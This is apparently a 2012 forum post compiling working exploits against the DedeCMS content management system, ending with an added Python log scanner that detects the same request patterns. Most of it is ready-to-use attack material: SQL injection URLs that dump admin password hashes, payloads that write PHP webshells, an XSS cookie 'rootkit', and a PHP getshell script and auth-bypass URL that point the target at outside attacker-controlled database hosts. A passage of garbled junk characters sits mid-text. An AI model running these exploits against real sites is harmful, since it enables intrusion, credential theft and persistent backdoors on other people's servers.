DedeCMS vulnerability summary

Posted on 2012-10-18 10:42:14

DedeCMS 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCMS v5.6 embedded malicious code execution vulnerability
Register a member account and upload a piece of software; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, writing a one-line shell directly.

DedeCMS 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so the XSS filter must be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; whichever of the URLs below you then visit, our XSS is triggered.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DedeCMS (织梦) variable override getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCMS v5.6-5.7 privilege bypass vulnerability (direct entry into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you go straight into the site backend.
This vulnerability requires knowing the backend path first.

DedeCMS (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert this row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourselves...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

DedeCMS <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, post an article and upload an image; then, in attachment management, replace the image with our carefully constructed template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just posted, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(construct this part)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if it reports that the edit succeeded, we have changed the template path. 3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Build the form above; after upload, the image is saved as /uploads/userup/3/1.gif.
Post an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (DedeCMS) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (DedeCMS) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

) v$ d* ^# _) v0 c. d. p+ a+ X( n; @7 i1 g8 x
' X1 a7 a+ \4 T2 ?3 i1 V9 W7 F
6 P; A0 p6 H. `7 e* M' p

; W4 J: L2 v& r# Z: w/ O2 ]
" A) P) Z% w. g: T4 Z. y# u/ d" w

3 y# v9 W" W% n, d/ Y2 j% W* J# j7 K7 h: ~
! N5 S  p& Y  J7 o
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
9 r+ |9 @. F0 x+ s/ O& a9 i% x; lplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
) C3 H) D( Y  t& z7 r5 [密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5

织梦 (DedeCMS) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (DedeCMS) select_soft_post.php uninitialised page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (DedeCMS) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
This exploits a MySQL numeric field overflow that raises an error, combined with DedeCMS writing the database error message into a PHP file whose header is never validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is shown.

2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the action address of its form is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After pressing OK, seeing the output from step 2 means the trojan file was uploaded successfully.

织梦 (DedeCMS) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
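Added example, not part of the original post: a Python scanner that runs the request signatures collected in this thread (GLOBALS/cfg_ variable override, raw sql= to advancedsearch.php, gotopage XSS, ../ traversal as in edit_face.php and carbuyaction.php, POSTs to mytag_js.php) over constructed Apache access-log lines. The IPs, host names and timestamps are made up.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format access-log lines modelled on the request
# patterns in this thread; IPs, host names and timestamps are made up.
SAMPLE_LOG = r"""
203.0.113.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Oct/2012:10:42:15 +0800] "GET /dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST%5BGLOBALS%5D%5Bcfg_dbhost%5D=192.0.2.9 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Oct/2012:10:42:16 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Oct/2012:10:42:17 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Oct/2012:10:42:18 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 64 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Oct/2012:10:43:00 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Oct/2012:10:43:01 +0800] "GET /plus/infosearch.php?action=search&q=test HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is matched against "METHOD path?query" after URL-decoding.
RULES = [
    # _POST[GLOBALS][cfg_dbhost]=..., _COOKIE[GLOBALS][...], cfg_basedir=...:
    # request-supplied names that smuggle values into DedeCMS config globals.
    ("global-var override", re.compile(r"[?&](?:_(?:GET|POST|COOKIE|REQUEST)|GLOBALS|cfg_)", re.I)),
    ("raw SQL in advancedsearch", re.compile(r"advancedsearch\.php\?.*[?&]sql=", re.I)),
    ("SQL injection keywords", re.compile(
        r"\b(?:union\s+select|updatexml\s*\(|select\s+.+?\s+from\s+\S*admin)", re.I)),
    ("script in gotopage (XSS)", re.compile(r"[?&]gotopage=[^&]*<", re.I)),
    ("path traversal", re.compile(r"\.\./")),
    # The _COOKIE[GLOBALS] override rides in the POST body, which the access log
    # never records, so any POST to this endpoint is the only visible trigger.
    ("POST to mytag_js.php", re.compile(r"^POST /plus/mytag_js\.php")),
]


def decode(target: str) -> str:
    """URL-decode up to three times so %25-style double encoding cannot hide a pattern."""
    for _ in range(3):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def scan_line(line: str):
    """Return a finding dict for one log line, or None if no rule matches."""
    m = LOG_RE.match(line)
    if not m:
        return None
    probe = f"{m['method']} {decode(m['target'])}"
    hits = [name for name, rx in RULES if rx.search(probe)]
    if not hits:
        return None
    return {"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "request": probe, "rules": hits}


def scan_log(text: str):
    """Scan a whole log text and return the findings in log order."""
    return [f for f in map(scan_line, text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['time']} [{', '.join(f['rules'])}] {f['request']}")
```

The _COOKIE[GLOBALS] and templet overrides travel in POST bodies that an access log never records, so those need a WAF or an application-level request-variable check rather than log review.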